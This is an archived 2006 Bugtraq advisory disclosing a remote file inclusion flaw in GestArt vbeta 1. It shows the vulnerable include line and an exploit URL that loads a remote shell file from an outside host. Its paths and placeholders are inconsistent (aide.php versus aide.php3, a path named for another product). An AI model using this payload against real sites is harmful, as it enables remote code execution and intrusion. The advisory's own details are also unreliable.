| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061026023151.21644.qmail@securityfocus.com>
Date: 26 Oct 2006 02:31:51 -0000
From: ip.123.456.78.90@...mail.com
To: bugtraq@...urityfocus.com
Subject: GestArt <= vbeta 1 Remote File Include Vulnerabilities
GestArt <= vbeta 1 Remote File Include Vulnerabilities
Found By : CoLd Zero [ Wasem898 ]
Palestine Muslim Hacker's
Code : include("$4AZHAR.Team")
######################################################
#
# [ GestArt vbeta 1]
#
# Class: Remote File Include Vulnerabilities
# Published 2006-10-25
# Remote: Yes
# Critical Level : Dangerous
# Site: http://www.comscripts.com/scripts/php.gestart.642.html
# Author: Cold Zero
# Contact: ip.123.456.78.90@...mail.com
#
######################################################
file ;
/gestArt/aide.php
======================================================
Vuln Code:
<? include("$aide.txt");?>
=======================================================
Exploit :
Http:// www.Victem.0 / [WM-News_path[
/gestArt/aide.php3?aide=http://ColdZero-Shell.txt?
---- Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [Root Shell]
[o0xxdark0o] ]organza[ [Huge] [H@...T]
---- GreeTz: All www.4azhar.Com Members
Cont : ip.123.456.78.90@...mail.com
Station : WWW.4AZHAR.COM
--------------------------------------|| Viva Palestine
||-----------------------------------------